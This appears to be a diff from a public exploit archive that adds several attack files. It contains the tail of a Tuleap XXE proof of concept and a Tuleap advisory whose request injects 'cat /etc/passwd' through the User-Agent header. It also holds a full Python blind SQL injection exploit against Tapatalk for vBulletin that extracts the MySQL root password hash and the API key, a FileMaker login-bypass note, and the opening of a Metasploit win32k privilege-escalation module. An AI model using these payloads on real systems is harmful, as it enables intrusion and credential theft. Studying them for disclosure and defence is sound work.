<decorator REF="F11-V1" r="255" g="204" b="51"/>
<decorator REF="F11-V2" r="255" g="153" b="0"/>
<decorator REF="F11-V3" r="255" g="102" b="0"/>
<decorator REF="F11-V4" r="255" g="51" b="0"/>
<decorator REF="F11-V5" r="204" g="0" b="0"/>
<decorator REF="F11-V6" r="153" g="0" b="0"/>
<decorator REF="F11-V7" r="102" g="0" b="0"/>
<decorator REF="F11-V8" r="51" g="0" b="0"/>
</decorators>
</bind>
</formElement>
</formElements>
</formElement>
<formElement type="column" ID="F12" rank="12">
<name>column10</name>
<label>Column Details 2</label>
<formElements>
<formElement type="sb" ID="F13" rank="0">
<name>category</name>
<label>Category</label>
<description>Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...)</description>
<bind type="static" is_rank_alpha="0"/>
</formElement>
</formElements>
</formElement>
<formElement type="date" ID="F14" rank="20" use_it="0">
<name>close_date</name>
<label>End Date</label>
<description>End Date</description>
<properties default_value="today"/>
</formElement>
<formElement type="msb" ID="F15" rank="31" use_it="0">
<name>multi_assigned_to</name>
<label>Assigned to (multiple)</label>
<description>Who is in charge of this artifact</description>
<properties size="7"/>
<bind type="users">
<items>
<item label="group_members"/>
</items>
</bind>
</formElement>
</formElements>
</formElement>
<formElement type="fieldset" ID="F17" rank="283">
<name>fieldset1</name>
<label>Stage</label>
<formElements>
<formElement type="column" ID="F18" rank="0">
<name>column3</name>
<label>Stage 1</label>
<formElements>
<formElement type="sb" ID="F19" rank="2">
<name>status_id</name>
<label>Status</label>
<description>Artifact Status</description>
<bind type="static" is_rank_alpha="0">
<items>
<item ID="F19-V0" label="New"/>
<item ID="F19-V1" label="Unconfirmed"/>
<item ID="F19-V2" label="Verified"/>
<item ID="F19-V3" label="Resolved"/>
<item ID="F19-V4" label="Closed"/>
<item ID="F19-V5" label="Reopened"/>
</items>
</bind>
</formElement>
<formElement type="sb" ID="F20" rank="5" use_it="0">
<name>stage</name>
<label>Stage</label>
<description>Stage in the life cycle of the artifact</description>
<bind type="static" is_rank_alpha="0">
<items>
<item ID="F20-V0" label="New">
<description>The artifact has just been submitted</description>
</item>
<item ID="F20-V1" label="Analyzed">
<description>The cause of the artifact has been identified and documented</description>
</item>
<item ID="F20-V2" label="Accepted">
<description>The artifact will be worked on.</description>
</item>
<item ID="F20-V3" label="Under Implementation">
<description>The artifact is being worked on.</description>
</item>
<item ID="F20-V4" label="Ready for Review">
<description>Updated/Created non-software work product (e.g. documentation) is ready for review and approval.</description>
</item>
<item ID="F20-V5" label="Ready for Test">
<description>Updated/Created software is ready to be included in the next build</description>
</item>
<item ID="F20-V6" label="In Test">
<description>Updated/Created software is in the build and is ready to enter the test phase</description>
</item>
<item ID="F20-V7" label="Approved">
<description>The artifact fix has been succesfully tested. It is approved and awaiting release.</description>
</item>
<item ID="F20-V8" label="Declined">
<description>The artifact was not accepted.</description>
</item>
<item ID="F20-V9" label="Done">
<description>The artifact is closed.</description>
</item>
</items>
</bind>
</formElement>
</formElements>
</formElement>
<formElement type="column" ID="F21" rank="2">
<name>column4</name>
<label>Stage 2</label>
<formElements>
<formElement type="sb" ID="F22" rank="0">
<name>resolution</name>
<label>Resolution</label>
<description>The resolution field indicates what happened to the bug.</description>
<bind type="static" is_rank_alpha="0">
<items>
<item ID="F22-V0" label="Fixed"/>
<item ID="F22-V1" label="Will not fix"/>
<item ID="F22-V2" label="Invalid"/>
<item ID="F22-V3" label="Later"/>
<item ID="F22-V4" label="Duplicate"/>
<item ID="F22-V5" label="Remind"/>
<item ID="F22-V6" label="Works for me"/>
</items>
</bind>
</formElement>
</formElements>
</formElement>
<formElement type="column" ID="F23" rank="3">
<name>column9</name>
<label>Stage 3</label>
<formElements>
<formElement type="sb" ID="F24" rank="0" notifications="1">
<name>assigned_to</name>
<label>Assigned to</label>
<description>Who is in charge of solving the artifact</description>
<bind type="users">
<items>
<item label="group_members"/>
</items>
</bind>
</formElement>
</formElements>
</formElement>
</formElements>
</formElement>
<formElement type="fieldset" ID="F25" rank="284">
<name>fieldset1</name>
<label>Attachments</label>
<formElements>
<formElement type="file" ID="F26" rank="0">
<name>attachment</name>
<label>Attachments</label>
</formElement>
</formElements>
</formElement>
<formElement type="fieldset" ID="F27" rank="286">
<name>fieldset1</name>
<label>References</label>
<formElements>
<formElement type="cross" ID="F28" rank="0">
<name>cross_references</name>
<label>Cross references</label>
<description>List of items referenced by or referencing this item.</description>
</formElement>
<formElement type="art_link" ID="F29" rank="1" use_it="0">
<name>references</name>
<label>References</label>
<properties size="30"/>
</formElement>
</formElements>
</formElement>
<formElement type="fieldset" ID="F30" rank="287">
<name>fieldset1</name>
<label>Permissions</label>
<formElements>
<formElement type="perm" ID="F31" rank="0">
<name>permissions_on_artifact</name>
<label>Permissions on artifact</label>
<description>Let users groups to define who can access an artifact.</description>
</formElement>
</formElements>
</formElement>
<formElement type="sb" ID="F32" rank="26" use_it="0">
<name>platform</name>
<label>Platform</label>
<bind type="static" is_rank_alpha="0">
<items>
<item ID="F32-V0" label="Linux"/>
<item ID="F32-V1" label="Windows XP"/>
<item ID="F32-V2" label="Solaris"/>
<item ID="F32-V3" label="Windows 2000"/>
<item ID="F32-V4" label="Other"/>
</items>
</bind>
</formElement>
<formElement type="sb" ID="F33" rank="28" use_it="0">
<name>source</name>
<label>Source</label>
<description>Customer from which the request comes from.</description>
<bind type="static" is_rank_alpha="0"/>
</formElement>
<formElement type="sb" ID="F34" rank="30" use_it="0">
<name>version</name>
<label>Version</label>
<description>Product version concerned by the bug.</description>
<bind type="static" is_rank_alpha="0"/>
</formElement>
</formElements>
<semantics>
<semantic type="title">
<shortname>title</shortname>
<label>Titre</label>
<description>Définir le titre d'un artéfact</description>
<field REF="F8"/>
</semantic>
<semantic type="status">
<shortname>status</shortname>
<label>Ã?tat</label>
<description>Définir l'état d'un artifact</description>
<field REF="F19"/>
<open_values>
<open_value REF="F19-V0"/>
<open_value REF="F19-V1"/>
<open_value REF="F19-V2"/>
<open_value REF="F19-V3"/>
<open_value REF="F19-V5"/>
</open_values>
</semantic>
<semantic type="contributor">
<shortname>contributor</shortname>
<label>Contributor/assignee</label>
<description>Define the contributor/assignee of an artifact</description>
<field REF="F24"/>
</semantic>
<semantic type="tooltip">
<field REF="F2"/>
<field REF="F8"/>
<field REF="F19"/>
</semantic>
</semantics>
<reports>
<report is_default="0">
<name>Bugs</name>
<description>The system default artifact report</description>
<criterias>
<criteria rank="0">
<field REF="F19"/>
</criteria>
<criteria rank="1">
<field REF="F24"/>
</criteria>
<criteria rank="2">
<field REF="F6"/>
</criteria>
<criteria rank="3">
<field REF="F2"/>
</criteria>
<criteria rank="4">
<field REF="F5"/>
</criteria>
<criteria rank="5">
<field REF="F8"/>
</criteria>
<criteria rank="6">
<field REF="F9"/>
</criteria>
<criteria rank="7">
<field REF="F22"/>
</criteria>
<criteria rank="8">
<field REF="F13"/>
</criteria>
</criterias>
<renderers>
<renderer type="table" rank="0" chunksz="15" multisort="15">
<name>Results</name>
<columns>
<field REF="F2"/>
<field REF="F8"/>
<field REF="F6"/>
<field REF="F24"/>
<field REF="F3"/>
</columns>
</renderer>
<renderer type="plugin_graphontrackersv5" rank="1">
<name>Charts</name>
<description>Graphic Report</description>
<charts>
<chart type="pie" width="600" height="400" rank="0" base="F19">
<title>Status</title>
<description>Number of Artifacts by Status</description>
</chart>
<chart type="bar" width="600" height="400" rank="1" base="F11">
<title>Severity</title>
<description>Number of Artifacts by severity level</description>
</chart>
<chart type="pie" width="600" height="400" rank="2" base="F24">
<title>Assignment</title>
<description>Number of Artifacts by Assignee</description>
</chart>
</charts>
</renderer>
</renderers>
</report>
<report is_default="0">
<name>Default</name>
<description>The system default artifact report</description>
<criterias>
<criteria rank="0">
<field REF="F19"/>
</criteria>
<criteria rank="1">
<field REF="F24"/>
</criteria>
<criteria rank="2">
<field REF="F6"/>
</criteria>
<criteria rank="3">
<field REF="F2"/>
</criteria>
<criteria rank="4">
<field REF="F13"/>
</criteria>
</criterias>
<renderers>
<renderer type="table" rank="0" chunksz="15" multisort="15">
<name>Results</name>
<columns>
<field REF="F2"/>
<field REF="F8"/>
<field REF="F6"/>
<field REF="F24"/>
<field REF="F3"/>
</columns>
</renderer>
</renderers>
</report>
</reports>
<workflow>
<field_id REF="F19"/>
<is_used>1</is_used>
<transitions>
<transition>
<from_id REF="null"/>
<to_id REF="F19-V0"/>
</transition>
<transition>
<from_id REF="F19-V0"/>
<to_id REF="F19-V1"/>
</transition>
<transition>
<from_id REF="F19-V0"/>
<to_id REF="F19-V2"/>
</transition>
<transition>
<from_id REF="F19-V0"/>
<to_id REF="F19-V4"/>
</transition>
<transition>
<from_id REF="F19-V1"/>
<to_id REF="F19-V2"/>
</transition>
<transition>
<from_id REF="F19-V1"/>
<to_id REF="F19-V4"/>
</transition>
<transition>
<from_id REF="F19-V3"/>
<to_id REF="F19-V4"/>
</transition>
<transition>
<from_id REF="F19-V4"/>
<to_id REF="F19-V5"/>
</transition>
<transition>
<from_id REF="F19-V5"/>
<to_id REF="F19-V3"/>
</transition>
<transition>
<from_id REF="F19-V5"/>
<to_id REF="F19-V4"/>
</transition>
<transition>
<from_id REF="F19-V0"/>
<to_id REF="F19-V3"/>
</transition>
<transition>
<from_id REF="F19-V1"/>
<to_id REF="F19-V3"/>
</transition>
<transition>
<from_id REF="F19-V2"/>
<to_id REF="F19-V3"/>
</transition>
<transition>
<from_id REF="F19-V2"/>
<to_id REF="F19-V4"/>
</transition>
</transitions>
</workflow>
<permissions>
<permission scope="tracker" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_ACCESS_FULL"/>
<permission scope="field" REF="F2" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F3" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F5" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F6" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F8" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F8" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F8" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F9" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F9" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F9" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F11" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F11" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F11" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F13" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F13" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F13" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F14" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F14" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F14" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F15" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F15" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F15" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F19" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F19" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F19" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F20" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F20" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F20" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F22" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F22" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F22" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F24" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F24" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F24" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F26" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F26" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F26" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F28" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F29" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F29" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F29" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F31" ugroup="UGROUP_PROJECT_ADMIN" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F32" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F32" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F32" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F33" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F33" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F33" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<permission scope="field" REF="F34" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
<permission scope="field" REF="F34" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
<permission scope="field" REF="F34" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
<!--TODO TRACKER_ADMIN <permission scope="field" REF="F31" ugroup="UGROUP_PLUGIN_TRACKER_ADMIN" type="PLUGIN_TRACKER_FIELD_UPDATE"/> -->
</permissions>
</tracker>
-----------------------------12077103611061
Content-Disposition: form-data; name="name"
Bugs
-----------------------------12077103611061
Content-Disposition: form-data; name="description"
Bugs Tracker
-----------------------------12077103611061
Content-Disposition: form-data; name="itemname"
bug
-----------------------------12077103611061
Content-Disposition: form-data; name="Create"
Créer
-----------------------------12077103611061--
2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following:
https://[ip]/plugins/tracker/?group_id=102&tracker=12
3) Using retrieved tracker number and URL, a XXE can be trigerred by visiting the retrieved URL:
https://[ip]/plugins/tracker/?group_id=102&tracker=12
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7177/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

41
platforms/php/webapps/35100.txt Executable file
View file

@ -0,0 +1,41 @@
Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap
CVE: CVE-2014-7178
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
Details:
Tuleap does not validate the syntax of the requests submitted to SVN handler pages in order to validate weather request passed to passthru() function are introducing any extra parameters that would be executed in the content of the application.
This vulnerability can be exploited by external attackers to introduce external commands into the workflow of the application that would execute them as shown on the attached Proof Of Concept code below.
After registering with the application and sending a request similar to the one below the vulnerability can be triggered:
GET /svn/viewvc.php/?roottype=svn&root=t11 HTTP/1.1
Host: [IP]
User-Agent: M" && cat /etc/passwd > /usr/share/codendi/src/www/passwd.txt && "ozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[IP]/svn/?group_id=102
Cookie: PHPSESSID=2uqjkd0iupn84gigi4e1tekg95; TULEAP_session_hash=362a9e41d1a93c8f195db4ccc6698ef5
Connection: keep-alive
Cache-Control: max-age=0
Note: In order to exploit this vulnerability a user needs to be in position to see SVN repository.
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7178/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

233
platforms/php/webapps/35102.py Executable file
View file

@ -0,0 +1,233 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@author: tintinweb 0x721427D8
'''
import urllib2, urllib
import xmlrpclib,re, urllib2,string,itertools,time
from distutils.version import LooseVersion
class Exploit(object):
def __init__(self, target, debug=0 ):
self.stopwatch_start=time.time()
self.target = target
self.path = target
self.debug=debug
if not self.target.endswith("mobiquo.php"):
self.path = self.detect_tapatalk()
if not self.path:
raise Exception("Could not detect tapatalk or version not supported!")
self.rpc_connect()
self.attack_func = self.attack_2
def detect_tapatalk(self):
# request page, check for tapatalk banner
handlers = [
urllib2.HTTPHandler(debuglevel=self.debug),
urllib2.HTTPSHandler(debuglevel=self.debug),
]
ua = urllib2.build_opener(*handlers)
ua.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3')]
data = ua.open(self.target).read()
if self.debug:
print data
if not "tapatalkDetect()" in data:
print "[xx] could not detect tapatalk. bye..."
return None
# extract tapatalk version
print "[ i] Taptalk detected ... ",
path = "".join(re.findall(r"^\s*<link href=[\s'\"]?(http://.*?/)smartbanner/appbanner.css", data, re.MULTILINE|re.DOTALL))
path+="mobiquo.php"
print "'%s' ... "%path,
data = urllib.urlopen(path).read()
version = "".join(re.findall(r"Current Tapatalk plugin version:\s*([\d\.a-zA-Z]+)", data))
if LooseVersion(version) <= LooseVersion("5.2.1"):
print "v.%s :) - OK"%version
return path
print "v.%s :( - not vulnerable"%version
return None
def rpc_connect(self):
self.rpc = xmlrpclib.ServerProxy(self.path,verbose=self.debug)
def attack_1(self, sqli, sleep=2):
'''
SELECT subscribethreadid
FROM subscribethread AS subscribethread
LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
WHERE subscribethreadid = <INJECTION>
AND subscribethreadid.userid = 0";
<INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
'''
query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep)
query += "union select subscribethreadid from subscribethread where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0"
if self.debug:
print """ SELECT subscribethreadid
FROM subscribethread AS subscribethread
LEFT JOIN user AS user ON (user.userid=subscribethread.userid)
WHERE subscribethreadid = %s
AND subscribethread.userid = 0"""%query
return self.rpc.unsubscribe_topic("s_%s"%query) #no escape, invalid_char="_"
def attack_2(self, sqli, sleep=2):
'''
SELECT subscribeforumid
FROM subscribeforum AS subscribeforum
LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
WHERE subscribeforumid = <INJECTION>
AND subscribeforum.userid = 0";
<INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
'''
query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep)
query += "union select subscribeforumid from subscribeforum where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0"
if self.debug:
print """ SELECT subscribeforumid
FROM subscribeforum AS subscribeforum
LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
WHERE subscribeforumid = %s
AND subscribeforum.userid = 0"""%query
return self.rpc.unsubscribe_forum("s_%s"%query) #no escape, invalid_char="_"
def attack_blind(self,sqli,sleep=2):
return self.attack_func(sqli,sleep=sleep)
#return self.attack_func("-1 OR subscribethreadid = ( %s AND (select sleep(4)) ) UNION SELECT 'aaa' FROM subscribethread WHERE subscribethreadid = -1 OR 1 "%sqli)
def attack_blind_guess(self,query, column, charset=string.ascii_letters+string.digits,maxlength=32, sleep=2, case=True):
'''
provide <query> = select -1 from user where user='debian-sys-maint' where <COLUMN> <GUESS>
'''
hit = False
# PHASE 1 - guess entry length
print "[ ] trying to guess length ..."
for guess_length in xrange(maxlength+1):
q = query.replace("<COLUMN>","length(%s)"%column).replace("<GUESS>","= %s"%guess_length)
self.stopwatch()
self.attack_blind(q, sleep)
duration = self.stopwatch()
print ".",
if duration >= sleep-sleep/8:
# HIT! - got length! => guess_length
hit = True
print ""
break
if not hit:
print "[ !!] unable to guess password length, check query!"
return None
print "[ *] LENGTH = %s"%guess_length
# PHASE 2 - guess password up to length
print "[ ] trying to guess value ..."
hits = 0
result = ""
for pos in xrange(guess_length):
# for each char pos in up to guessed length
for attempt in self.bruteforce(charset, 1):
# probe all chars in charset
#attempt = re.escape(attempt)
if attempt == "%%":
attempt= "\%"
#LIKE binary = case sensitive.might be better to do caseinsensitive search + recheck case with binary
q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE '%s%s%%' "%(result,attempt))
self.stopwatch()
self.attack_blind(q, sleep)
duration = self.stopwatch()
#print result,attempt," ",duration
print ".",
if duration >= sleep-sleep/8:
if case:
# case insensitive hit - recheck case: this is drastically reducing queries needed.
q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE binary '%s%s%%' "%(result,attempt.lower()))
self.stopwatch()
self.attack_blind(q, sleep)
duration = self.stopwatch()
if duration >= sleep-sleep/8:
attempt = attempt.lower()
else:
attempt = attempt.upper()
# case sensitive - end
# HIT! - got length! => guess_length
hits += 1
print ""
print "[ +] HIT! - %s[%s].."%(result,attempt)
result += attempt
break
if not hits==guess_length:
print "[ !!] unable to guess password length, check query!"
return None
print "[ *] SUCCESS!: query: %s"%(query.replace("<COLUMN>",column).replace("<GUESS>","='%s'"%result))
return result
def bruteforce(self, charset, maxlength):
return (''.join(candidate)
for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i)
for i in range(1, maxlength + 1)))
def stopwatch(self):
stop = time.time()
diff = stop - self.stopwatch_start
self.stopwatch_start=stop
return diff
if __name__=="__main__":
#googledork: https://www.google.at/search?q=Tapatalk+Banner+head+start
DEBUG = False
TARGET = "http://TARGET/vbb4/forum.php"
x = Exploit(TARGET,debug=DEBUG)
print "[ ] TAPATALK for vBulletin 4.x - SQLi"
print "[--] Target: %s"%TARGET
if DEBUG: print "[--] DEBUG-Mode!"
print "[ +] Attack - sqli"
query = u"-1 UNION SELECT 1%s"%unichr(0)
if DEBUG:
print u""" SELECT subscribeforumid
FROM subscribeforum AS subscribeforum
LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
WHERE subscribeforumid = %s
AND subscribeforum.userid = 0"""%query
print "[ *] guess mysql user/pass"
print x.attack_blind_guess("select -1 from mysql.user where user='root' and <COLUMN> <GUESS>",
column="password",
charset="*"+string.hexdigits,
maxlength=45) # usually 40 chars + 1 (*)
print "[ *] guess apikey"
print x.attack_blind_guess("select -1 from setting where varname='apikey' and <COLUMN> <GUESS>",
column='value',
charset=string.ascii_letters+string.digits,
maxlength=14,
)
print "-- done --"

64
platforms/windows/local/35077.txt Executable file
View file

@ -0,0 +1,64 @@
Filemaker Login Bypass and Privilege Escalation
=======================================================================
[ADVISORY INFORMATION]
Title: Filemaker Login Bypass and Privilege Escalation
Discovery date: 19/10/2014
Release date: 19/10/2014
Vendor Homepage: www.filemaker.com
Version: Filemaker Pro 13.0v3 - FileMaker Pro Advanced 12.0v4
Credits: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b)
[VULNERABILITY INFORMATION]
Class: Authentication Bypass and Privilege Escalation
Category: Desktop Application
Severity: High
CVSS v2 Vector: 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C
[AFFECTED PRODUCTS]
This security vulnerability affects:
* FileMaker Pro 13.0v3 - FileMaker Pro Advanced 12.0v4
[VULNERABILITY DETAILS]
There is a obvious vulnerability of FileMaker that allow access to the local FM-based database file:
On DBEngine dll, there is a function called MatchPasswordData:
...
...
...
5BB8D53A C68424 74020000 >MOV BYTE PTR SS:[ESP+274],0
5BB8D542 FF15 D437D25B CALL DWORD PTR DS:[<&Support.??1PasswordHash@Draco@@QAE@XZ>] <-- Compute the password's hash.
5BB8D548 8B8C24 6C020000 MOV ECX,DWORD PTR SS:[ESP+26C]
5BB8D54F 5F POP EDI
5BB8D550 5E POP ESI
5BB8D551 8AC3 MOV AL,BL <-- if AL is 0 then you are not authenticated else if AL is 1 you are authenticated,
so simply by changing a single bit you are able to bypass the login,
also if your username is Admin, you can obtain a privilege escalation and full permissions on DB.
5BB8D553 64:890D 00000000 MOV DWORD PTR FS:[0],ECX
5BB8D55A 5B POP EBX
5BB8D55B 8BE5 MOV ESP,EBP
5BB8D55D 5D POP EBP
5BB8D55E C2 0400 RETN 4
...
...
...
it doesn't matter if your desktop or mobile application is developed in a "secure manner", your confidential data on the database can be accessed.
[DISCLOSURE TIME-LINE]
* 19/10/2014 - Public disclosure and simultaneously initial vendor contact.
[DISCLAIMER]
The author is not responsible for the misuse of the information provided in
this security advisory. The advisory is a service to the professional security
community. There are NO WARRANTIES with regard to this information. Any
application or distribution of this information constitutes acceptance AS IS,
at the user's own risk. This information is subject to change without notice.

158
platforms/windows/local/35101.rb Executable file
View file

@ -0,0 +1,158 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super(update_info(info, {
'Name' => 'Windows TrackPopupMenu Win32k NULL Pointer Dereference',
'Description' => %q{
This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability
can be triggered through the use of TrackPopupMenu. Under special conditions, the
NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
code execution. This module has been tested successfully on Windows XP SP3, Windows
2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows
2008 R2 SP1 64 bits.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # vulnerability discovery and exploit in the wild
'juan vazquez', # msf module (x86 target)
'Spencer McIntyre' # msf module (x64 target)
],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
[
# Tested on (32 bits):
# * Windows XP SP3
# * Windows 2003 SP2
# * Windows 7 SP1
# * Windows 2008
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
# Tested on (64 bits):
# * Windows 7 SP1
# * Windows 2008 R2 SP1
